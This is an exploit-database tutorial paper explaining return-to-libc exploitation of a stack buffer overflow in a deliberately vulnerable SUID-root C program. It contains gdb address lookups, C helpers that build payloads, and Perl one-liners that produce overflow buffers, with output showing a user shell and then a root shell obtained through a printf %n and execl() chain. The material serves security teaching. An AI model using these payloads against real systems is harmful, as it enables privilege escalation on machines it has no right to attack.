Exploitation - Returning into libc

EDB-ID:    13197
CVE:       N/A
Author:    shaun2k2
Type:      papers
Platform:  Multiple
Published: 2006-04-08

                     __           __           __                     
  .-----.--.--.----.|  |.--.--.--|  |.-----.--|  |  .-----.----.-----.
  |  -__|_   _|  __||  ||  |  |  _  ||  -__|  _  |__|  _  |   _|  _  |
  |_____|__.__|____||__||_____|_____||_____|_____|__|_____|__| |___  |
   by shaun2k2 - member of excluded-team                       |_____|


                     ######################################
                     # Exploitation - Returning into libc #
                     ######################################

				


################
# Introduction #
################

Generic vulnerabilities in applications, such as the infamous "buffer overflow 
vulnerability", crop up regularly in many immensely popular software packages 
thought to be secure by most, and programmers continue to make the same mistakes 
as a result of lazy or sloppy coding practices.  As programmers wise up to the 
common techniques employed by hackers when exploiting buffer overflow 
vulnerabilities, the likelihood of being able to execute arbitrary shellcode on 
the program stack decreases.  One reason is that some operating systems are 
beginning to use non-executable stacks by default, which makes executing 
shellcode on the stack when exploiting a vulnerable application a significantly 
more challenging task.  Another is that many IDSs automatically detect simple 
shellcode, making shellcode injection more of a chore.
As with most scenarios, with a problem comes a solution.  With a little 
knowledge of the libc functions and their operation, one can take an alternate 
approach to executing arbitrary code as a result of exploitation of a buffer 
overflow vulnerability or another bug: returning to libc.


The intention of this article is not to teach you the ins and outs of buffer 
overflows, but to explain in a little detail another technique used to execute 
arbitrary code as opposed to the classic 'NOP sled + shellcode + repeated 
retaddr' method.  I assume readers are familiar with buffer overflow 
vulnerabilities and the basics of how to exploit them.  A little bit of the 
theory of memory organisation is also desirable, such as how the little-endian 
byte ordering system works.  To those who are not familiar with buffer overflow 
bugs, I suggest you read "Smashing the Stack for Fun and Profit".

<http://www.phrack.org/phrack/49/P49-14>


#######################
# Returning into libc #
#######################

As the name suggests, the entire concept of the technique is that instead of 
overwriting the saved return address (the value loaded into the EIP register 
when the function returns) with the predicted or approximate address of your 
NOP sled or your shellcode in memory, you overwrite it with the address of a 
function contained within the libc library, with any function arguments 
following.  An example of such would be to exploit a buffer overflow bug to 
overwrite EIP with the address of system() or execl() included in the libc 
library to run an interactive shell (/bin/sh for example).  This idea is quite 
reasonable, and since it does not involve estimating return addresses and 
building large exploit buffers, this is quite an appealing technique, but it 
does have its downsides, which I shall explain later.

Let me demonstrate an example of the technique.  Let's say we have the following 
small example program, vulnprog:


--START
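/* vulnprog.c - deliberately vulnerable example */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strcpy() */

int main(int argc, char *argv[]) {

    if(argc < 2) {
        printf("Usage: %s <string>\n", argv[0]);
        exit(-1);
    }

    char buf[5];

    /* No bounds check: anything longer than 4 characters overflows buf. */
    strcpy(buf, argv[1]);
    return(0);
}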


gcc vulnprog.c -o vulnprog
chown root vulnprog
chmod +s vulnprog

--END


Anyone with a tiny bit of knowledge of buffer overflows can see that the 
preceding program is ridiculously insecure, and allows anybody who exceeds the 
bounds of `buf' to overwrite data on the stack.  It would usually be quite easy 
to write an exploit for the above example program, but let's assume that our 
friendly administrator has just read a computer security book and has enabled a 
non-executable stack as a security measure.  This requires us to think a little 
outside the box in order to be able to execute arbitrary code, but we already 
have our solution: return into a libc function.

How, you may ask, do we actually get the information we need and prepare an 
'exploit buffer' in order to execute a libc function as a result of a buffer 
overflow?  Well, all we need is the address of the desired libc function, and 
the address of any function arguments.  So let's say for example we wanted to 
exploit the above program (it is SUID root) to execute a shell (we want /bin/sh) 
using system() - all we'd need is the address of system() and then the address 
at which the string "/bin/sh" is stored, right?  Correct.  "But how do we begin 
to get this info?"  That is what we're about to find out.


--START
[shaunige@localhost shaunige]$ echo "int main() { system(); }" > test.c
[shaunige@localhost shaunige]$ cat test.c
int main() { system(); }
[shaunige@localhost shaunige]$ gcc test.c -o test
[shaunige@localhost shaunige]$ gdb -q test
(gdb) break main
Breakpoint 1 at 0x8048342
(gdb) run
Starting program: /home/shaunige/test

Breakpoint 1, 0x08048342 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x4005f310 <system>
(gdb) quit
The program is running.  Exit anyway? (y or n) y
[shaunige@localhost shaunige]$
--END


First, I created a tiny dummy program which calls the libc function 'system()' 
without any arguments, and compiled it.  Next, I loaded the dummy program into 
gdb, set a breakpoint on main() and ran it, so that libc was mapped into memory 
by the time the breakpoint was hit.  Asking gdb to print 'system' then gives us 
the location of the libc function system() in memory - and, on a system that 
does not randomise library load addresses, it shall remain there until libc is 
recompiled.  So, now we have the address of system(), which puts us half way 
there.  However, we still need to know how we can store the string "/bin/sh" in 
memory and ultimately reference it whenever needed.  Let's think about this for 
a moment.  Maybe we could use an environment variable to hold the string?  Yes, 
in fact, an environment variable would be ideal for this task, so let's create 
and use an environment variable called $HACK to store our string ("/bin/sh").  
But how are we going to know the memory address of our environment variable and 
ultimately our string?  We can write a simple utility program to grab the memory 
address of the environment variable.  Consider the following code:


--START
/* getenv.c - print the address at which an environment variable's value lives */
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {

    if(argc < 2) {
        printf("Usage: %s <environ_var>\n", argv[0]);
        exit(-1);
    }

    char *addr_ptr;

    /* getenv() returns a pointer to the value string, or NULL if unset. */
    addr_ptr = getenv(argv[1]);

    if(addr_ptr == NULL) {
        printf("Environment variable %s does not exist!\n", argv[1]);
        exit(-1);
    }

    printf("%s is stored at address %p\n", argv[1], (void *)addr_ptr);
    return(0);
}
--END


This program will give us the address of a given environment variable.  Let's 
test it out:


--START
[shaunige@localhost shaunige]$ gcc getenv.c -o getenv
[shaunige@localhost shaunige]$ ./getenv TEST
Environmental variable TEST does not exist!
[shaunige@localhost shaunige]$ ./getenv HOME
HOME is stored at address 0xbffffee2
[shaunige@localhost shaunige]$
--END


Great, it seems to work.  Now, let's get down to actually creating our variable 
with the desired string "/bin/sh" and get the address of it.

First I create the environmental variable, and then I run our above program to 
get the memory location of a desired environment variable:


--START
[shaunige@localhost shaunige]$ export HACK="/bin/sh"
[shaunige@localhost shaunige]$ echo $HACK
/bin/sh
[shaunige@localhost shaunige]$ ./getenv HACK
HACK is stored at address 0xbffff9d8
[shaunige@localhost shaunige]$
--END


This is good: we now have all of the information we need to exploit the 
vulnerable program: the address of 'system()' (0x4005f310) and the address of 
the environment variable $HACK holding our string "/bin/sh" (0xbffff9d8).  Bear 
in mind that the address reported by our utility is only exact for a process 
with the same environment and program name length; inside another binary the 
string may sit a few bytes away.  So, what do we do with this stuff?  Well, like 
in all instances of exploiting a buffer overflow hole, we craft an exploit 
buffer, but ours is somewhat different from the one you may be used to seeing, 
with repeated NOPs (known as a 'NOP sled'), shellcode and repeated return 
addresses.  Our exploit buffer needs to look something like this:


--START


-----------------------------------------------------------------------------  
|     system() addr     |     return address     |     system() argument    |
-----------------------------------------------------------------------------

--END


"But wait, I thought you said we don't need a return address?".  We don't, but 
libc functions expect a return address on the stack to return to after the 
function has finished its job.  We don't care if the program segmentation faults 
after running the shell, so the value we put in that slot is irrelevant.  
Instead of a real address, we'll just specify 4 bytes of garbage data, "HACK" 
for example.  So, with this in mind, a representation of our whole buffer needs 
to look like this:


--START

----------------------------------------------------------------------
|  DATA-TO-OVERFLOW-BUFFER   |   0x4005f310  |  HACK  |  0xbffff9d8  |
----------------------------------------------------------------------

--END


The data represented by 'DATA-TO-OVERFLOW-BUFFER' is just garbage data used to 
overflow beyond the bounds ("boundaries") of the `buf' variable far enough to 
position the address of the libc 'system()' function (0x4005f310) over the saved 
return address, from where it is loaded into the EIP register when main() 
returns.
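
As a rough illustration of that layout, here is a minimal C sketch that writes 
the filler, the function address, the dummy return address and the argument 
address into a byte array.  The helper names (put_le32, build_system_payload) 
and the "BLEH" filler are my own choices for illustration, not part of any 
library, and the number of filler words is left as a parameter because it has 
to be found by experiment.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Store a 32-bit value least-significant byte first (x86 byte order). */
static void put_le32(unsigned char *dst, uint32_t value)
{
    dst[0] = (unsigned char)(value & 0xff);
    dst[1] = (unsigned char)((value >> 8) & 0xff);
    dst[2] = (unsigned char)((value >> 16) & 0xff);
    dst[3] = (unsigned char)((value >> 24) & 0xff);
}

/*
 * Hypothetical helper (not from the article): lay out
 *   [ pad_words * "BLEH" ][ func addr ][ 4 junk bytes ][ arg addr ]
 * in `out`.  Returns the number of bytes written, or 0 if `cap` is too small.
 */
size_t build_system_payload(unsigned char *out, size_t cap, size_t pad_words,
                            uint32_t func_addr, uint32_t arg_addr)
{
    size_t pad_bytes = pad_words * 4;
    size_t need = pad_bytes + 12;
    size_t i;

    assert(out != NULL);
    if (cap < need)
        return 0;

    for (i = 0; i < pad_words; i++)
        memcpy(out + i * 4, "BLEH", 4);        /* filler before the return address */

    put_le32(out + pad_bytes, func_addr);      /* replaces the saved return address */
    memcpy(out + pad_bytes + 4, "HACK", 4);    /* dummy return address for the function */
    put_le32(out + pad_bytes + 8, arg_addr);   /* first argument of the function */
    return need;
}
```

The function only fills a caller-supplied array; none of the addresses in the 
article contains a zero byte, which matters because the result has to survive 
being passed as a C string.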

It looks now like we have all of the information and theory we need: build a 
buffer containing the address of a libc function, followed by a return address 
to return to after executing the function, followed by any function arguments 
for the libc function.  The buffer will need garbage data at the beginning so as 
to overflow far enough into memory to overwrite the saved return address with 
the address of system(), so that execution jumps to it instead of the next 
instruction in the program (the same technique used when using shellcode: inject 
an arbitrary memory address into EIP).  Now that we have all of the necessary 
theory of this technique and the required information for actually implementing 
it (i.e. the address of a libc function and the memory address of the string 
"/bin/sh"), let's exploit this thing!


################
# EXPLOITATION #
################

We have the necessary stuff, so let's get on with the ultimate goal: to get a 
root shell by executing 'system("/bin/sh")' rather than shellcode!  Let's assume 
that we are exploiting a Linux system with a non-executable stack, so we have no 
other option than to 'return into libc'.

Remembering back to the diagram representation of our exploit buffer, we should 
recall that garbage data must precede the buffer so that we are writing into 
EIP, followed by the memory location of 'system()', then followed by a return 
address which we do not need, followed by the memory address of "/bin/sh".  
Let's see if we can exploit vulnprog.c this way.  If you think back, we have 
already set and exported the environmental variable $HACK, but let's do it again 
and grab the memory address, just for clarity's sake.


--START
[shaunige@localhost shaunige]$ export HACK="/bin/sh"
[shaunige@localhost shaunige]$ echo $HACK
/bin/sh
[shaunige@localhost shaunige]$ ./getenv HACK
HACK is stored at address 0xbffff9d8
[shaunige@localhost shaunige]$
--END


Good, we now have the address of our string.  You should also remember that we 
created a dummy program which called 'system()' from which we got our address of 
system() with the help of GDB.  The address was 0x4005f310.  We've got the 
stuff, let's write that exploit!  We'll do it with Perl from the console, 
because it gives us more flexibility and more room for testing than writing a 
larger program in C does.

First, we must reverse the bytes of the addresses of 'system()' and the 
environment variable holding "/bin/sh", due to the fact that we are working on a 
system using the little-endian byte ordering system.  This gives us:


'system()' address:
####################

\x10\xf3\x05\x40


$HACK's address:
#################

\xd8\xf9\xff\xbf
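
If you would rather not reverse the bytes by hand, the conversion can be 
sketched in a few lines of C.  The function name le32_escape is hypothetical; it 
simply prints the four bytes of an address, lowest byte first, in the \xNN 
notation used above.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Hypothetical helper: write `addr` as four "\xNN" escapes, least-significant
 * byte first, into `out` (16 characters plus the terminating zero byte).
 * Returns the number of characters written, excluding the terminator.
 */
int le32_escape(uint32_t addr, char out[17])
{
    assert(out != NULL);
    return snprintf(out, 17, "\\x%02x\\x%02x\\x%02x\\x%02x",
                    (unsigned)(addr & 0xff),
                    (unsigned)((addr >> 8) & 0xff),
                    (unsigned)((addr >> 16) & 0xff),
                    (unsigned)((addr >> 24) & 0xff));
}
```

Passing 0x4005f310 fills the array with the text \x10\xf3\x05\x40, ready to be 
pasted into a Perl string.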


And we know that the return address expected by every libc function just needs 
to be a 4-byte value.  We'll just use "HACK".  Therefore, our exploit buffer 
looks like this so far:


\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf

But something is missing.  In its current state, if fed to vulnprog, the 
address of 'system()' would NOT end up in EIP like we want, because we wouldn't 
have overflowed the 'buf' variable far enough to reach the saved return address. 
So, as shown on our above diagram of our exploit buffer, we're going to need to 
prepend garbage data onto the beginning of our exploit buffer to overwrite far 
enough into the stack region to reach that return address.  How can we know how 
much garbage data we need, as it needs to be spot on?  The only reasonable way 
is just trial-n-error.  After playing with vulnprog a little, I found that we 
will probably need about 6-9 words of garbage data.


--START

[shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x6 . 
"\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'`
Segmentation fault

[shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x9 . 
"\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'`
Segmentation fault

[shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x8 . 
"\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'`
Segmentation fault

[shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x7 .
"\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'`
sh-2.05b$ whoami
shaunige
sh-2.05b$ exit
exit
[shaunige@localhost shaun]$

--END


The exploit worked, and it needed 7 words of dummy data.  But wait, why don't we 
have a rootshell?  ``vulnprog'' is SUID root, so what's going on?  'system()' 
runs the specified command (in our case "/bin/sh") through /bin/sh itself, and 
that shell (bash, judging by the sh-2.05b prompt) gives up its SUID privileges 
when it starts with an effective UID that differs from the real UID.  So the 
privileges were dropped, giving us a shell, but not a rootshell.  Therefore, the 
exploit *did* work, but we're going to have to use a libc function that 
*doesn't* drop privileges before executing the path specified ("/bin/sh" in our 
scenario).


#####################
# Using a 'wrapper' #
#####################

Hmm, what to do?  We're going to have to use one of the exec() functions, as 
they do not use /bin/sh, thus not dropping privileges.  First, let's make our 
job a little easier, and create a little program that will run a shell for us 
(called a wrapper program).  


--START
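/* expl_wrapper.c */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* setuid(), setgid() */

int main() {
    /* Make the real IDs root as well, so the shell keeps its privileges. */
    setuid(0);
    setgid(0);
    system("/bin/sh");
    return(0);
}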
--END


We need a plan: instead of using 'system()' to run a shell, we'll overwrite the 
return address on the stack (the value that ends up in EIP) with the address of 
the 'execl()' function in the libc library.  We'll tell 'execl()' to execute our 
wrapper program (compiled from expl_wrapper.c), which raises our privs and 
executes a shell.  Voila, a root shell.  However, this is not going to be as 
easy as the last experiment.  For a start, the execl() function needs a NULL 
pointer as its last argument, but 'strcpy()' in vulnprog.c will think that a 
NULL byte (\x00 in hex representation) means the end of the string, thus making 
the exploit fail.  Instead, we can use 'printf()' to write the NULLs at run 
time, without any NULLs appearing in the exploit buffer.  This time, our exploit 
buffer needs to look like this:


--START

---------------------------------------------------------------------------------------------------
| GARBAGE | printf() addr | execl() addr | %3$n addr | wrapper addr | wrapper addr | addr of here |
---------------------------------------------------------------------------------------------------

--END


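You may notice "%3$n addr".  This is the address of a format string for 
'printf()'.  The %n conversion stores the number of characters printed so far 
(zero here, since nothing else is printed) at the address given by its argument, 
and thanks to direct parameter access, %3$ selects the third argument: it skips 
over the two "wrapper addr" words and writes through 'addr of here', placing 
NULLs at the end of the exploit buffer.  This time, the address of 'printf()' 
overwrites the saved return address, so 'printf()' executes first; when it 
returns, it returns into 'execl()', which executes our wrapper program.  This 
will result in a rootshell since vulnprog is SUID root.

'addr of here' needs to be the address of its own slot on the stack, so that 
the slot is overwritten with NULLs by 'printf()' and becomes the terminating 
NULL argument of the 'execl()' call.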
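
To see why the NULL has to be produced at run time rather than typed into the 
buffer, here is a small C sketch of the constraint.  Both function names are 
made up for illustration: one reports whether a 32-bit word contains a zero 
byte, the other reports how much of a byte sequence a strcpy()-style copy would 
carry across.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Returns 1 if any of the four bytes of `word` is zero, else 0. */
int has_nul_byte(uint32_t word)
{
    int shift;

    for (shift = 0; shift < 32; shift += 8) {
        if (((word >> shift) & 0xff) == 0)
            return 1;
    }
    return 0;
}

/*
 * How many bytes of `payload` a strcpy()-style copy would carry across:
 * everything up to, but not including, the first zero byte.
 */
size_t bytes_surviving_strcpy(const unsigned char *payload, size_t len)
{
    const unsigned char *nul;

    assert(payload != NULL);
    nul = memchr(payload, 0, len);
    return nul ? (size_t)(nul - payload) : len;
}
```

A literal NULL pointer is four zero bytes, so has_nul_byte(0) is 1 and the copy 
would stop right there, whereas has_nul_byte() is 0 for each of the libc 
addresses used in this article.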

To get the addresses of 'printf()' and 'execl()' libc library functions, we'll 
again write a tiny test program, and use GDB to help us out.


--START
/* test.c */

#include <stdio.h>

int main() {
execl();
printf(0);
}

[shaunige@localhost shaunige]$ gcc test.c -o test -g
[shaunige@localhost shaunige]$ gdb -q ./test
(gdb) break main
Breakpoint 1 at 0x804837c: file test.c, line 4.
(gdb) run
Starting program: /home/shaunige/test

Breakpoint 1, main () at test.c:4
4               execl();
(gdb) p execl
$1 = {<text variable, no debug info>} 0x400bde80 <execl>
(gdb) p printf
$2 = {<text variable, no debug info>} 0x4006e310 <printf>
(gdb) quit
The program is running.  Exit anyway? (y or n) y
[shaunige@localhost shaunige]$
--END


Excellent, just as we wanted, we now have the addresses of libc 'execl()' and 
'printf()'.  We'll be using 'printf()' to write NULLs (with the format string 
"%3$n"), so we'll need to place the printf() format string %3$n in memory.  
Using the format string %3$n to write NULLs works because it uses direct 
positional parameters (hence the '$' in the format string) - %3$ tells printf() 
to skip over the first two function arguments of 'execl()' (the address of our 
wrapper program followed by the address of the wrapper program again), and %n 
writes the count of characters printed so far, which is zero, into the location 
after the second argument of the execl function.  Let's use an environment 
variable again, due to past success with them.  We'll also use an environment 
variable to store the path of our wrapper program which invokes a shell, 
"/home/shaunige/wrapper".
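
The effect of %n with a positional parameter can be tried in isolation.  The 
following is only a sketch, with a function name of my own: unlike the bare 
"%3$n" string used in the exploit, which relies on the C library tolerating 
unnamed positions 1 and 2, this format names all three positions so that its 
behaviour is well defined.  Positional conversions are a POSIX extension rather 
than ISO C.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Overwrite *slot using only a format string.  "%3$n" stores the number of
 * characters produced so far into the int that argument 3 points to.  The two
 * "%s" conversions consume empty strings, so that number is 0.
 * Returns the character count reported by snprintf().
 */
int zero_via_percent_n(int *slot)
{
    char scratch[4];

    assert(slot != NULL);
    return snprintf(scratch, sizeof scratch, "%1$s%2$s%3$n", "", "", slot);
}
```

Whatever value the int held beforehand, it holds zero after the call, which is 
exactly the property the exploit needs for its final argument.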


--START
[shaunige@localhost shaunige]$ export NULLSTR="%3\$n"
[shaunige@localhost shaunige]$ echo $NULLSTR
%3$n
[shaunige@localhost shaunige]$ export WRAPPER_PROG="/home/shaunige/wrapper"
[shaunige@localhost shaunige]$ echo $WRAPPER_PROG
/home/shaunige/wrapper
[shaunige@localhost shaunige]$ ./getenv NULLSTR
NULLSTR is stored at address 0xbfffff5f
[shaunige@localhost shaunige]$ ./getenv WRAPPER_PROG
WRAPPER_PROG is stored at address 0xbffff9a9
[shaunige@localhost shaunige]$
--END


We now have all of the addresses which we need, except the last argument: 'addr 
of here'.  This needs to be the address that this last word will occupy on the 
stack once the exploit buffer has been copied into place.  Assuming the same 7 
words of garbage as before, that is the memory address of the overflowable 'buf' 
variable + 48 bytes: 28 bytes of garbage plus the five 4-byte addresses that 
come before it.  But how will we get the address of 'buf'?  All we need to do is 
add an extra line of code to vulnprog.c, recompile it, and we will have the 
address in memory of 'buf':


--START
[shaunige@localhost shaunige]$ cat vulnprog.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strcpy() */

int main(int argc, char *argv[]) {
    if(argc < 2) {
        printf("Usage: %s <string>\n", argv[0]);
        exit(-1);
    }

    char buf[5];

    /* Extra line: reveal where buf lives on the stack. */
    printf("addr of buf is: %p\n", (void *)buf);

    strcpy(buf, argv[1]);
    return(0);
}

[shaunige@localhost shaunige]$ gcc vulnprog.c -o vulnprog
[shaunige@localhost pcalc-000]$ ../vulnprog `perl -e 'print
"1234"x13'`
addr of buf is: 0xbffff780
Segmentation fault
[shaunige@localhost pcalc-000]$
--END


With a little simple hexadecimal addition (48 is 0x30), we can determine that 
0xbffff780 + 48 = 0xbffff7b0.  This is the address which is the final function 
argument of 'execl()', where the NULLs will be located.  We now have all of the 
information we need, so exploitation will be easy.  Again, I'm going to craft 
the exploit buffer from the console with perl.  Let's get going!
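
The same sum can be written out as a tiny C helper.  The name slot_address is 
hypothetical, and the split of 48 bytes into 7 filler words plus 5 address words 
assumes the exploit buffer starts at the first byte of 'buf'.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Address of the stack slot that sits `pad_words` filler words plus
 * `chain_words` address words past the start of the buffer (4 bytes each).
 */
uint32_t slot_address(uint32_t buf_addr, uint32_t pad_words, uint32_t chain_words)
{
    uint32_t offset = 4u * (pad_words + chain_words);

    assert(buf_addr <= UINT32_MAX - offset);   /* no wrap-around past 4 GiB */
    return buf_addr + offset;
}
```

With buf_addr = 0xbffff780, pad_words = 7 and chain_words = 5 (printf, execl, 
the format string and the wrapper path twice), the offset is 48 bytes and the 
result is 0xbffff7b0.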


--START

[shaunige@localhost shaunige]$ ./vulnprog `perl -e 'print "1234"x7 . 
"\x10\xe3\x06\x40" . "\x80\xde\x0b\x40" . "\x5f\xff\xff\xbf" . "\xa9\xf9\xff\xbf" 
. "\xa9\xf9\xff\xbf" . "\xb0\xf7\xff\xbf"'`

sh-2.05b#

--END


Well, well, looks like our little exploit worked!  Depending on your machine's 
stack, you may need more garbage data (used for spacing) preceding your exploit 
buffer, but it worked fine for us.

The exploit buffer was fed to 'vulnprog', thus overwriting the return address on 
the stack with the address of the libc 'printf()' function.  'printf()' then 
wrote NULLs into the correct place, and returned straight into 'execl()'.  Then 
'execl()' executed our wrapper program as instructed, which was designed to 
invoke a shell (/bin/sh) with the privileges of 'vulnprog' (root), leaving us 
with a lovely rootshell.  Voila.



##############
# Conclusion #
##############

I have hopefully given you a quick insight into an alternative way of executing 
arbitrary code during the exploitation of a stack-based overflow vulnerability 
in a given program.  Non-executable stacks are becoming more and more common in 
modern operating systems, and knowing how to 'return into libc' rather than 
using shellcode can be a very useful thing to know.  I hope you've enjoyed this 
article, and I appreciate feedback.

<shaun2k2@excluded.org>
http://www.excluded.org


# milw0rm.com [2006-04-08]